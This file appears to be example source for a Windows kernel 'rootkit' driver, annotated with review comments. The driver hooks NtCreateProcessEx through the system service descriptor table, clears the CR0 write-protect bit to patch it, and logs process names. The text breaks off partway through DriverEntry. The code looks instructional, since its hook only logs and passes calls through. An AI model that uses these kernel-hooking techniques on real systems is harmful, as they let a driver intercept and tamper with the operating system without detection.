// Length of process name (rounded up to next DWORD). Must be at least
// NT_PROCNAMELEN + 1 (17) bytes, because GetProcessName writes a terminating
// NUL at index NT_PROCNAMELEN; 20 satisfies that.
#define PROCNAMELEN 20
// Maximum length of NT process name (number of bytes copied out of the
// process object by GetProcessName; presumably the EPROCESS image-name field).
#define NT_PROCNAMELEN 16
// Byte offset of the image-name field inside the process object, discovered at
// run time by GetProcessNameOffset(). Static storage, so it starts at 0, and 0
// is treated as "not found" by GetProcessName.
ULONG gProcessNameOffset;
<br />
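// Locates the byte offset of the image-name field inside the process object by
// scanning the current process for the string "System" and storing the offset
// in gProcessNameOffset. If several matches occur the last one wins (the loop
// does not stop at the first hit); if none occurs gProcessNameOffset is left
// unchanged.
//
// NOTE(review): the scan reads up to 3*PAGE_SIZE bytes past the start of the
// process object with no bounds check; if that range reaches unmapped memory
// the read faults at kernel level. It also only works if the calling context
// is the System process (DriverEntry calls it) — assumption, confirm.
void GetProcessNameOffset()
{
    PEPROCESS curproc = PsGetCurrentProcess();
    PCHAR base = (PCHAR) curproc;
    // Hoisted out of the loop: strlen("System") is a compile-time constant.
    const size_t namelen = sizeof("System") - 1;
    // ULONG rather than int: avoids a signed/unsigned comparison against
    // PAGE_SIZE and matches the type of gProcessNameOffset.
    ULONG i;

    for (i = 0; i < 3 * PAGE_SIZE; i++) {
        if (strncmp("System", base + i, namelen) == 0) {
            gProcessNameOffset = i;
        }
    }
}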
<br />
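// Copies the current process's image name into theName.
//
// theName must have room for NT_PROCNAMELEN + 1 bytes: NT_PROCNAMELEN bytes are
// copied with strncpy and a terminating NUL is always written at
// theName[NT_PROCNAMELEN], since strncpy alone does not guarantee termination.
//
// Returns TRUE on success. Returns FALSE when gProcessNameOffset is still 0
// (GetProcessNameOffset() never found the field); theName is then set to the
// empty string so a caller that ignores the result never prints an
// uninitialized buffer. No lock is taken and no IRQL is raised around the read
// (the unused oldirql/i locals of the original were dropped).
BOOL GetProcessName( PCHAR theName )
{
    PEPROCESS curproc;
    PCHAR nameptr;

    if( !gProcessNameOffset )
    {
        theName[0] = '\0';
        return FALSE;
    }

    curproc = PsGetCurrentProcess();
    nameptr = (PCHAR) curproc + gProcessNameOffset;
    strncpy( theName, nameptr, NT_PROCNAMELEN );
    theName[NT_PROCNAMELEN] = '\0'; /* strncpy may not terminate */
    return TRUE;
}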
<br />
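// Replacement service routine installed in place of NtCreateProcessEx. Logs
// the name of the calling process via DbgPrint and then forwards every
// argument unchanged to OldNtCreateProcessEx (the saved original entry,
// assigned in DriverEntry), returning whatever it returns.
//
// Parameters mirror the native NtCreateProcessEx signature and are passed
// through untouched.
NTSTATUS NewNtCreateProcessEx(
    OUT PHANDLE ProcessHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
    IN HANDLE ParentProcess,
    IN BOOLEAN InheritObjectTable,
    IN HANDLE SectionHandle OPTIONAL,
    IN HANDLE DebugPort OPTIONAL,
    IN HANDLE ExceptionPort OPTIONAL,
    IN HANDLE Unknown OPTIONAL)
{
    CHAR aProcessName[PROCNAMELEN];

    // GetProcessName can fail when the name offset was never found; the
    // original ignored the result and handed an uninitialized stack buffer to
    // DbgPrint's %s. Fall back to an empty string instead.
    if( !GetProcessName( aProcessName ) )
    {
        aProcessName[0] = '\0';
    }
    DbgPrint("rootkit: NewNtCreateProcessEx() from %s\n", aProcessName);

    return OldNtCreateProcessEx(ProcessHandle, DesiredAccess,
        ObjectAttributes, ParentProcess, InheritObjectTable, SectionHandle,
        DebugPort, ExceptionPort, Unknown);
}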
<br />
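// Dispatch routine registered for every IRP major function in DriverEntry.
// The driver exposes no real I/O, so each request is completed immediately
// with STATUS_SUCCESS and no data transferred.
//
// DeviceObject is unused. Returns STATUS_SUCCESS.
NTSTATUS
OnStubDispatch(
    IN PDEVICE_OBJECT DeviceObject,
    IN PIRP Irp
    )
{
    Irp->IoStatus.Status = STATUS_SUCCESS;
    // Information was never set in the original; report zero bytes transferred
    // rather than leaving whatever the field held.
    Irp->IoStatus.Information = 0;
    IoCompleteRequest( Irp, IO_NO_INCREMENT );
    // Once completed the IRP may already be freed, so the original's
    // "return Irp->IoStatus.Status" read a possibly dead object. Return the
    // status we set instead.
    return STATUS_SUCCESS;
}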
<br />
// Driver unload routine: writes the saved original NtCreateProcessEx entry
// back into the service table so the hook does not outlive the driver.
//
// The table lives in read-only memory, so the store is bracketed by clearing
// and restoring the write-protect (WP) bit of CR0 using MSVC x86 `_asm`
// blocks (this does not build for x64, which has no inline assembler).
//
// NOTE(review): CLI/STI only affect the current processor; on a multiprocessor
// system other CPUs can still be dispatching through the table while it is
// modified. The service index 0x32 is hard-coded here and in DriverEntry and is
// not portable across kernel builds; a mismatch overwrites an unrelated entry.
// The restore is unconditional — if OldNtCreateProcessEx was never assigned
// (DriverEntry's remaining paths are not visible here) the table entry is
// clobbered; confirm against DriverEntry. DriverObject is unused.
VOID OnUnload( IN PDRIVER_OBJECT DriverObject )
{
    DbgPrint("ROOTKIT: OnUnload called\n");

    _asm
    {
        CLI //disable interrupts on this processor
        MOV EAX, CR0 //move CR0 register into EAX
        AND EAX, NOT 10000H //clear the WP bit (bit 16) so the read-only table page can be written
        MOV CR0, EAX //write register back
    }

    // Restore the original routine at index 0x32. The cast on the left-hand
    // side is a nonstandard cast-as-lvalue that MSVC accepts as an extension.
    (NTCREATEPROCESSEX)(*(((PServiceDescriptorTableEntry)KeServiceDescriptorTable)->ServiceTableBase + 0x32))=OldNtCreateProcessEx;

    _asm
    {
        MOV EAX, CR0 //move CR0 register into EAX
        OR EAX, 10000H //set the WP bit again
        MOV CR0, EAX //write register back
        STI //re-enable interrupts
    }
}
<br />
NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRegistryPath )<br />
{<br />
int i;<br />
<br />
DbgPrint("My Driver Loaded!");<br />
GetProcessNameOffset();<br />
<br />
// Register a dispatch function<br />
for (i = 0; i < IRP_MJ_MAXIMUM_FUNCTION; i++) <br />
{<br />
theDriverObject->MajorFunction[i] = OnStubDispatch;<br />
}<br />
<br />
theDriverObject->DriverUnload = OnUnload; <br />
<br />
// save old system call locations<br />
//OldNtCreateProcessEx=(NTCREATEPROCESSEX)(SYSTEMSERVICE(0x32));<br />
OldNtCreateProcessEx=(NTCREATEPROCESSEX)(*(((PServiceDescriptorTableEntry)KeServiceDescriptorTable)->ServiceTableBase + 0x32));<br />
<br />
<br />